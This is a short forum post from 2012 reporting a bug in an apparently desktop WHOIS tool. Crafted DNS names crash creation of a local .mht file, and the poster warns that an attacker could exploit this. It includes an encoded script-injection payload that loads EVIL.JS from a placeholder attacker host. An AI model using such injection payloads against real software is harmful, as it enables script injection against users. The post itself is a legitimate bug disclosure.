|
Post by 101 on Jun 12, 2012 6:58:31 GMT -5
Hi
I just want to report a little bug. A Whois cannot contains DNS names with specials chars ; it will be replaced with a "?". The local file .mht cannot be created - crash :x
Of course, this is only a clide side request but... try a "Who is..." on: "=3CSCRIPT=20SRC=3D'HTTP=3A=2F=2FATTACKER=2FEVIL.JS'=3E=3C=2FSCRIPT=3E"
Sooo... an attacker could exploit this with a special crafted whois response.
Regards,
|
|